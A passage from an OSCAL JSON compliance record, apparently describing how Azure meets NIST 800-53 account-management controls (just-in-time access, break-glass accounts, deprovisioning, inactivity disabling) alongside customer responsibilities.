approves or rejects) for automation or uses Just In Time (JIT) approvals for interactive user access. JIT provides personnel elevated access for a defined period to resolve live site or deployment incidents. Azure has automated the JIT access request process through the JIT portal by defining policies for access provisioning and revocation. Service teams must define a JIT policy indicating which users may request JIT elevation, the duration of that elevation, and the scope of elevation. The default duration is eight (8) hours, with a maximum of seven (7) days. JIT policy changes are dual-key. The user initiates the access request by logging into the JIT portal and submitting the JIT access request. The access request submitted through the JIT portal is first adjudicated by system policies, then further evaluated against policies defined by the service that owns the resource - which could immediately deny the request, approve the request if conditions are met, or route the request to appropriate team members based on workflow configured in the service team policy, which is also dual-key._x000D_ _x000D_ Barring any approved exceptions - including those approved due to lack of JIT support, the only persistent elevated access permitted to the Azure production environment is JIT break glass access, which alerts the resource owner when invoked._x000D_ _x000D_ Azure account authorizers review accounts quarterly. Additionally, when a user is promoted or transferred to another group, the account authorizers review and modify or revoke as necessary user role and access rights according to the access policies. Furthermore, OneIdentity automatically terminates access depending on the rules configured for the project and the new manager's approval if not manually approved after transfer. The user is required to resubmit a request for access when that individual's access is close to expiring._x000D_ _x000D_ For additional protection, Azure Security Monitoring (ASM) and SCUBA monitor service team operating systems for unexpected account creations. This includes monitoring for if an administrator or privileged role is added to an Azure subscription at the operating system layer, intended to prevent persistent access from bypassing the JIT process._x000D_ _x000D_ When a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR Administrator and the user. The user's resignation includes the user's last working day. If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. On the user's last day, referred to as the termination date, access is shut off automatically since the Manager Self-Service (MSS) system is tied to the SAP systems; the user's status switches to inactive and they are removed from payroll and benefits. If the user is leaving for a competitor, their access to the environment and buildings is terminated within forty-eight (48) hours. _x000D_ _x000D_ OneIdentity disables any user accounts daily if no HR record exists within the MSS system, such as after termination, or if the accounts have been inactive over one hundred and eight (180) days. Accounts that have been disabled for fifteen (15) days after one hundred and eight (180) days of inactivity are deleted. Accounts can also be requested for disabling via OneIdentityand MyAccess._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ccd79f08-ef46-4fd9-882c-4c1de18d944f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-011"}],"description":"The customer is responsible for establishing an account management process for all customer-controlled account types. Azure can sync user entities and groups allowing them to be used to permission users to resources in Azure.","provided-uuid":"1e323e41-f0d4-4034-ba3b-b2b47a483873"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2e24bc82-1a54-459a-8130-3c071e9d8d45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.g","by-components":[{"uuid":"9e37b5ea-3bec-4141-aa1d-f108708d00fd","export":{"provided":[{"uuid":"6b4cfe39-0df0-41ad-aff8-9183eee2856c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-012"}],"description":"Azure monitors the use of information system accounts using the audit logging and monitoring pipeline. This includes the appropriate configuration of local log settings, the central collection of log data, and the detection and alerting of suspicious activity."}],"responsibilities":[{"uuid":"2fdfb2f1-408e-4334-aad2-73290f0395e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-012"}],"description":"The customer is responsible for monitoring the use of all customer-controlled accounts.","provided-uuid":"6b4cfe39-0df0-41ad-aff8-9183eee2856c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6cc4bfc4-66aa-4848-81a7-68d1e7b9782d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-014"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-015"}],"statement-id":"ac-2_smt.h","by-components":[{"uuid":"2d77d08c-5b11-4e12-9497-17da96e6af22","export":{"provided":[{"uuid":"f7d0739a-e5ae-45ad-98aa-38666a166637","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-013"}],"description":"When a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR administrator. The Employee Central system also automatically notifies Core Services Engineering and Operations (CSEO) and the Global Security Group of the user's last working day. The user's resignation includes the user's last working day. If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. For urgent terminations, the HR administrator will also notify Core Services Engineering and Operations (CSEO) outside of the Employee Central notification window to initiate immediate action to disable access. As a result, Azure user accounts are disabled upon the user's last working day or during the time when access is requested to be disabled. When a user is promoted or transferred to another group, the user role and access rights are reviewed and revoked according to the access policy. The user profile is changed after proper approvals and authorization from the respective group owners. Accounts of terminated users and transferred users are deactivated after confirmation from the appropriate manager. User accounts are evaluated daily to determine if they are actively employed by Microsoft. The OneIdentity Life Cycle Management job is run daily to disable any user accounts within Azure domains if there is no HR record or if they have been inactive over one hundred and eighty (180) days. Azure receives a daily HR feed of personnel, which it compares to the list of Azure domain users. Any user accounts that do not have a matching HR record have had a position change in the HR record or have been flagged as inactive are then disabled by the tools."},{"uuid":"4b5d0850-db9b-407a-ae47-f637e765bd0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-014"}],"description":"When a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR administrator. The Employee Central system also automatically notifies Core Services Engineering and Operations (CSEO) and the Global Security Group of the user's last working day. The user's resignation includes the user's last working day. If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. For urgent terminations, the HR administrator will also notify Core Services Engineering and Operations (CSEO) outside of the Employee Central notification window to initiate immediate action to disable access. As a result, Azure user accounts are disabled upon the user's last working day or during the time when access is requested to be disabled. When a user is promoted or transferred to another group, the user role and access rights are reviewed and revoked according to the access policy. The user profile is changed after proper approvals and authorization from the respective group owners. Accounts of terminated users and transferred users are deactivated after confirmation from the appropriate manager. User accounts are evaluated to determine if they are actively employed by Microsoft daily. The OneIdentity Life Cycle Management job is run to disable any user accounts within Azure domains daily if there is no HR record or have been inactive over one hundred and eighty (180) days. Azure receives a daily HR feed of personnel, which it compares to the list of Azure domain users. Any user accounts that do not have a matching HR record have had a position change in the HR record or have been flagged as inactive are then disabled by the tools."},{"uuid":"dfa3cb0b-3ccb-4066-a854-1b401a7313f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-015"}],"description":"When a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR administrator. The Employee Central system also automatically notifies Core Services Engineering and Operations (CSEO) and the Global Security Group of the user's last working day. The user's resignation includes the user's last working day. If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. For urgent terminations, the HR administrator will also notify Core Services Engineering and Operations (CSEO) outside of the Employee Central notification window to initiate immediate action to disable access. As a result, Azure user accounts are disabled upon the user's last working day or during the time when access is requested to be disabled. When a user is promoted or transferred to another group, the user role and access rights are reviewed and revoked according to the access policy. The user profile is changed after proper approvals and authorization from the respective group owners. Accounts of terminated users and transferred users are deactivated after confirmation from the appropriate manager. User accounts are evaluated to determine if they are actively employed by Microsoft daily. The OneIdentity Life Cycle Management job is run to disable any user accounts within Azure domains daily if there is no HR record or have been inactive over one hundred and eighty (180) days. Azure receives a daily HR feed of personnel, which it compares to the list of Azure domain users. Any user accounts that do not have a matching HR record have had a position change in the HR record or have been flagged as inactive are then disabled by the tools."}],"responsibilities":[{"uuid":"2186543c-0096-4393-b86d-0ae077538ef5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-013"}],"description":"The customer is responsible for notifying customer account managers defined in AC-02 Part b of all customer-controlled accounts when users are terminated or transferred, accounts are no longer required, or system usage or need-to-know changes. All customers in the Azure environment that use identity federation are responsible for having a process in place for account management of their users including creating new user accounts for new employees, reviewing accounts periodically, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. Changes made to users' permissions in the customer AD are reflected in the claim presented via ADFS the next time a user is authenticated.","provided-uuid":"f7d0739a-e5ae-45ad-98aa-38666a166637"},{"uuid":"8038e4b1-e33a-42e4-b414-37073d84bf72","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-014"}],"description":"The customer is responsible for notifying customer account managers defined in AC-02 Part b of all customer-controlled accounts when users are terminated or transferred, accounts are no longer required, or system usage or need-to-know changes. All customers in the Azure environment that use identity federation are responsible for having a process in place for account management of their users including creating new user accounts for new employees, reviewing accounts periodically, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. Changes made to users' permissions in the customer AD are reflected in the claim presented via ADFS the next time a user is authenticated.","provided-uuid":"4b5d0850-db9b-407a-ae47-f637e765bd0c"},{"uuid":"32c4d311-2877-484e-b7dc-a29254d5b5f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-015"}],"description":"The customer is responsible for notifying customer account managers defined in AC-02 Part b of all customer-controlled accounts when users are terminated or transferred, accounts are no longer required, or system usage or need-to-know changes. All customers in the Azure environment that use identity federation are responsible for having a process in place for account management of their users including creating new user accounts for new employees, reviewing accounts periodically, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. Changes made to users' permissions in the customer AD are reflected in the claim presented via ADFS the next time a user is authenticated.","provided-uuid":"dfa3cb0b-3ccb-4066-a854-1b401a7313f9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cf885f12-7749-4cf0-893f-da7889a4674f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-017"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-018"}],"statement-id":"ac-2_smt.i","by-components":[{"uuid":"5705457c-bc37-4400-9f05-70df3dd50a7e","export":{"provided":[{"uuid":"a20e205a-9baa-4281-ba07-4707413e7b03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-016"}],"description":"OneIdentity enables role-based access to Azure's production network and supporting infrastructure in a secure manner that complies with least privilege policies and guidelines set by Microsoft. Access requests and modifications to Azure security groups and thus privileges in the Azure environment are approved based upon meeting criteria that determine the appropriateness of the requested role and is completed by an account approver based on rules defined in OneIdentity. Information system usage or need-to-know/need-to-share changes are managed by the owner of the service. The service owner and account approvers can request changes to the access of accounts on their service for AD accounts through OneIdentity"},{"uuid":"6f7fc8a9-c486-4931-80ff-98ae499123da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-017"}],"description":"OneIdentity enables role-based access to Azure's production network and supporting infrastructure in a secure manner that complies with least privilege policies and guidelines set by Microsoft. Access requests and modifications to Azure security groups and thus privileges in the Azure environment are approved based upon meeting criteria that determine the appropriateness of the requested role and is completed by an account approver based on rules defined in OneIdentity. Information system usage or need-to-know/need-to-share changes are managed by the owner of the service. The service owner and account approvers can request changes to the access of accounts on their service for AD accounts through OneIdentity"},{"uuid":"c9c7bb42-5397-4f6f-8f60-8004da677ff9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-018"}],"description":"OneIdentity enables role-based access to Azure's production network and supporting infrastructure in a secure manner that complies with least privilege policies and guidelines set by Microsoft. Access requests and modifications to Azure security groups and thus privileges in the Azure environment are approved based upon meeting criteria that determine the appropriateness of the requested role and is completed by an account approver based on rules defined in OneIdentity. Information system usage or need-to-know/need-to-share changes are managed by the owner of the service. The service owner and account approvers can request changes to the access of accounts on their service for AD accounts through OneIdentity"}],"responsibilities":[{"uuid":"64e85edc-06b5-4c56-b9db-aa38da19c8b2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-016"}],"description":"The customer is responsible for authorizing access to the customer system.","provided-uuid":"a20e205a-9baa-4281-ba07-4707413e7b03"},{"uuid":"3438299f-450e-40ad-a954-6dd8bb69e45e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-017"}],"description":"The customer is responsible for authorizing access to the customer system.","provided-uuid":"6f7fc8a9-c486-4931-80ff-98ae499123da"},{"uuid":"fe701b38-5595-4e28-ba20-b1743b2f19af","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-018"}],"description":"The customer is responsible for authorizing access to the customer system.","provided-uuid":"c9c7bb42-5397-4f6f-8f60-8004da677ff9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"53c534b0-ad03-4109-ab0a-fc454b066be9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.j","by-components":[{"uuid":"d70ee76c-0c71-4dd1-9fff-2cef4f533afe","export":{"provided":[{"uuid":"007bc294-ba78-40e0-b100-b3aede645524","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-019"}],"description":"Access is based on specific roles and duties to support the operational environments. The foundation is granting elevated access for a limited duration through JIT not to exceed twenty-four (24) hours; and a formal program that monitors account activities enabled by auditing account management actions. This provides ongoing review of accounts and alerts of changes. The objective is a continuous rather than static review of access authorizations and activities. There is no standing privileged access to the Azure production environment. Azure utilizes Just in Time (JIT) access and Break-Glass accounts for the implementation of this control. Individuals request elevated access for a specific, limited purpose. Upon approval, JIT grants temporary audited access on the Azure asset (e.g., assign RBAC role, assign claim, generate account and assign to the local administrator group on a virtual machine, etc.). The access is automatically revoked after a set limited time and all access grants are securely audited using the JIT system and/or destination resource logging mechanisms. JIT terminates access based on the rules configured in the adjudicating policy, as defined by the resource owner. Once a JIT grant has expired, the access will be revoked and the user must submit a new request for access if access is still required. Because no JIT access is provided exceeding twenty-four (24) hours, and all JIT requests are reviewed prior to approval either manually or via automated rules set by the owning service team, the intent of this requirement is met. Break-Glass accounts, which have persistent elevated access to the production environment, are only utilized in Break-Glass situations when JIT is inaccessible. The use of these accounts generates a Severity 2 ticket, which requires review immediately, meeting the intent of the requirement. Microsoft also executes a Quarterly Access Review (QAR) of all accounts each quarter. A full inventory of accounts is analyzed with the managers of each account identified. Managers are required to revalidate access for an account to remain active. If a manager indicates an account is no longer necessary, or a manager does not respond, the account is deactivated."}],"responsibilities":[{"uuid":"cb258854-89ec-4cae-b887-68ce9afd2d10","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-019"}],"description":"The customer is responsible for reviewing customer-controlled accounts at the required frequency to determine if accounts are compliant with all organization requirements.","provided-uuid":"007bc294-ba78-40e0-b100-b3aede645524"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a775924c-e49f-43e9-875f-ba5bc4ff1863","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.k","by-components":[{"uuid":"75e56736-07cf-41b9-9ebc-c34df1425b26","export":{"provided":[{"uuid":"791e3b8f-ac7c-46a2-a56e-df97f9aa0d14","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-020"}],"description":"Group or shared accounts are not utilized within Azure unless necessary, such as where the local account or accounts cannot be deleted or disabled, or where necessary for Break-Glass access. For accounts tracked as approved exceptions, the credentials are stored in an approved secret management store, which tracks and monitors access to secrets and ensures group or shared account usage is uniquely attributable to the user accessing it by associated the secret store logs with the group or shared account usage. When a user accesses the credentials in the secret management store, that user is identified uniquely, ensuring non-repudiation and attributing user activity to the shared account."}],"responsibilities":[{"uuid":"c6b90515-1c17-48ba-9535-a9b3835dd7a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-020"}],"description":"The customer is responsible for the management of customer-controlled shared/group account credentials when a user is removed from the shared/group account.","provided-uuid":"791e3b8f-ac7c-46a2-a56e-df97f9aa0d14"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"59658ca9-5eb2-4aa9-a603-6770bc529f7d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2_smt.l","by-components":[{"uuid":"04b44f95-e7a2-4a88-a3ba-994461dcc56e","export":{"provided":[{"uuid":"e3336fc6-8492-41b4-a695-76529a056b22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-021"}],"description":"Azure aligns account management processes with personnel termination and transfer processes. When a user leaves the company, their manager or their manager's work-on-behalf will submit the user's resignation in the Employee Central system. Subsequently, an automatic notification is sent to the HR Administrator and the user. The user's resignation includes the user's last working day. If the last working day needs to be changed, the user's manager or HR administrator will take the action to change the date in the HR database. The last working day information automatically flows to the HR database to ensure accounts tied to their CorpNet credentials are disabled on the user's last working day. On the user's last day, referred to as the termination date, access is shut off automatically since the Employee Central (EC) system is tied to the SAP systems; the user's status switches to inactive and they are removed from payroll and benefits. If the user is leaving for a competitor, their access to the environment and buildings is terminated within forty-eight (48) hours of their notification to terminate. When a user is promoted or transferred to another group, the user role and access rights are reviewed and revoked according to the access policy. The user profile is changed after proper approvals and authorization from the respective group owners. Accounts of terminated users are deactivated automatically upon OneIdentity's sync with SAP HR system. Transferred users are deactivated after confirmation from the appropriate manager. User accounts are evaluated to determine if they are actively employed by Microsoft daily. The OneIdentity Life Cycle Management job is run to disable any user accounts within Azure domains daily if there is no HR record or have been inactive over one hundred and eighty (180) days. Azure receives a daily HR feed of personnel, which it compares to the list of Azure domain users. Any user accounts that do not have a matching HR record have had a position change in the HR record or have been flagged as inactive are then disabled by the tools."}],"responsibilities":[{"uuid":"68f40800-aef8-4f66-a6bc-c16354ed98ef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-021"}],"description":"The customer is responsible for aligning account management processes with personnel termination and transfer processes for customer-deployed resources.","provided-uuid":"e3336fc6-8492-41b4-a695-76529a056b22"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2230551e-5477-4267-8efb-ea8611141c7a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.1","statements":[{"uuid":"b945ad67-d3f1-4617-8aaf-be10b1ddeec5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.1_smt","by-components":[{"uuid":"2fd49ffb-c2af-4772-a611-0e869cae649b","export":{"provided":[{"uuid":"4fafb2b3-d4ee-47c8-a928-c8d8fc166f16","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-022"}],"description":"CorpNet and Azure access are provisioned and managed using separate account management tools. CorpNet account management, using MyAccess, cannot provide access to Azure - it can only provide access to AD security groups that the Azure account management tool, OneIdentity, leverages. All standard access requests and approvals are managed through OneIdentity and MyAccess, supporting Azureand CorpNet, respectively, which are automated workflow management tools that track the process for all account requests, approvals, creations, modifications, and deletions. Azure uses Just in Time (JIT) access for elevated access to Azure. Individuals request access for a specific, limited purpose. Upon approval, JIT grants temporary, audited membership to the local administrator group or elevated role (e.g. Subscription Owner, Contributor, etc.). The membership is automatically revoked after a limited duration defined by the JIT policy, and all access grants are securely audited."}],"responsibilities":[{"uuid":"4740009b-9e5e-40fe-9af6-a3366b24f453","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-022"}],"description":"The customer is responsible for employing automated mechanisms to support account management activities for the account types defined in AC-02.a. All federal customers in the Azure environment use identity federation and are responsible for having a process in place for account management of their users including creating new user accounts for new employees, reviewing accounts periodically, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited and notifications should be sent to appropriate individuals as required. Changes made to users' permissions in the Federal Customer AD will be reflected in the claim presented via ADFS the next time a Federal user is authenticated.","provided-uuid":"4fafb2b3-d4ee-47c8-a928-c8d8fc166f16"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4e429296-bd3b-483d-80a9-253cd4d2005a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.2","statements":[{"uuid":"3c280ba9-a2c1-4850-baf3-a7a693401317","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-023"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-2.2_smt","by-components":[{"uuid":"4c589193-e014-4762-b3d6-0c55a82e0c5d","export":{"provided":[{"uuid":"03cbb0e6-e660-4da6-85d7-08283f75f5c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-023"}],"description":"The Microsoft Security Program Policy prohibits the use of temporary and emergency accounts. All local guest accounts are disabled on the system or platform wherever they are located. All account requests follow the standard account management process, including domain account request and approval and OneIdentity-based group management._x000D_ _x000D_ For servers that are not domain-joined, the JIT process for granting access to a server includes creating and enabling a local account for the duration of access. Because this access is tied to a specific user's domain account and requires that the user first authenticate using multifactor authentication, Azure does not consider this local account to be a temporary account for purposes of this control._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d181aac4-9443-4d03-aa45-7e95663c34eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-023"}],"description":"The customer is responsible for configuring the system to automatically remove or disable emergency and temporary accounts if those accounts have been defined in AC-02.a. **Customer Identity Federation** Federal user entities are responsible for having a process in place for account management of their users by creating new user accounts for new employees, modifying access in accordance with changes to employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. Federal customer authentication requests are processed by the customer authentication environment; when an employee is terminated in the customer environment they are no longer able to authenticate to the Azure environment.","provided-uuid":"03cbb0e6-e660-4da6-85d7-08283f75f5c9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3bcecbc7-40a8-4cb1-a7cb-0154ea841b6d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.3","statements":[{"uuid":"6affbcc1-7871-4ebf-a77d-91eab4ef1447","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.3_smt","by-components":[{"uuid":"1afb30c6-5ff7-4358-a9b5-d6527e702b15","export":{"provided":[{"uuid":"9a9dc13a-e280-4bbf-9080-a41639603d6e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-024"}],"description":"User accounts are automatically evaluated to determine if they are actively being used by Microsoft users. OneIdentity receives a daily HR feed of personnel, which it compares to the list of users. Any user accounts that do not have a matching HR record or have been flagged as inactive are then disabled by this process._x000D_ _x000D_ The OneIdentity process is used to disable any user accounts within AME and GME on a daily basis if there are no associated HR records, or the user accounts have been inactive over 90 for AME, 84 for GME days. All accounts are automatically disabled after the required days of time._x000D_ _x000D_ Inactive service accounts are never disabled. In an Active Directory environment, all service account IDs are completely unique. It is not possible to reuse or spoof a service account ID. There is no risk mitigated by retiring or disabling service account IDs._x000D_ _x000D_"}],"responsibilities":[{"uuid":"606cff13-8f30-42b2-afca-eb10fb157d43","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-024"}],"description":"The customer is responsible for configuring the system to automatically disable user accounts (for account types identified in AC-02.a) after an organization-defined period of inactivity. **Customer Identity Federation** Federal user entities are responsible for having a process in place for account management of their users by creating new user accounts for new employees, modifying access in accordance with changes in employee job responsibilities, and disabling the accounts of terminated employees. The processes should be automatically audited, and notifications should be sent to appropriate individuals as required. Since Federal user entities are authenticated by federal authentication systems and federated via ADFS when the users are terminated from the federal authentication provider they also lose access to Microsoft Azure. Federal user entities are responsible for automatically disabling federal Microsoft Azure accounts when the accounts are inactive or no longer used.","provided-uuid":"9a9dc13a-e280-4bbf-9080-a41639603d6e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"234c638c-5487-4e9a-9142-2b14efa32d71","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-2.4","statements":[{"uuid":"3a46ad46-e562-44c1-991f-69b30f1bbda0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-2.4_smt","by-components":[{"uuid":"9704f7f4-5ba8-4106-a8b4-d141b99cd172","export":{"provided":[{"uuid":"15b30bb1-274d-42f8-afc5-aab2a72d3c4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-025"}],"description":"OneIdentity, which is used to manage all Azure domain accounts, automatically logs account creation, modification, and disablement actions which are ingested into Geneva Monitoring._x000D_ _x000D_ Servers_x000D_ _x000D_ Azure performs auditing of elevated user accounts at the asset layer through Geneva Monitoring. The servers provide a record of account creation, modification, disabling, and termination of accounts, which notifies the Security Response Team for any suspicious activities._x000D_ _x000D_ Network Devices_x000D_ _x000D_ Network device access is audited via logs from the Authentication, Authorization, and Accounting (AAA) system. The AAA logs AAA Administration, which includes account creation, modification, and disablement._x000D_ 